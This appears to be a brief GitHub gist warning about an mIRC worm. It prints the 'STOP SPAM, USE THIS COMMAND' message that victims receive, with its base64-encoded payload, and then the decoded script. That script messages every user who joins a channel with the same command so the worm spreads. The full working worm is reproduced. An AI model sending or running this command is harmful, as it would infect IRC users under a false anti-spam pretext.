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Created November 16, 2022 01:33
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  • Save rmcdaniel/7c3d06cf867b58927ff95b40ea2ac01f to your computer and use it in GitHub Desktop.
Save rmcdaniel/7c3d06cf867b58927ff95b40ea2ac01f to your computer and use it in GitHub Desktop.
You get this
STOP SPAM, USE THIS COMMAND: //write nospam $decode(b24gISsxOmpvaW46Izp7IC5hdXNlciAyICRuaWNrIHwgLm1zZyAkbmljayBTVE9QIFNQQU0sIFVTRSBUSElTIENPTU1BTkQ6AzQgLy93cml0ZSBub3NwYW0gJCAkKyBkZWNvZGUoICQrICRlbmNvZGUoJHJlYWQoJHNjcmlwdCxuLDEpLG0pICQrICxtKSAkY2hyKDEyNCkgLmxvYWQgLXJzIG5vc3BhbSAkY2hyKDEyNCkgLy9tb2RlICQgJCsgbWUgK1IgfSB9,m) | .load -rs nospam | //mode $me +R
The encoded part decodes to this
on !+1:join:#:{ .auser 2 $nick | .msg $nick STOP SPAM, USE THIS COMMAND:4 //write nospam $ $+ decode( $+ $encode($read($script,n,1),m) $+ ,m) $chr(124) .load -rs nospam $chr(124) //mode $ $+ me +R } }
And starts spreading to other people
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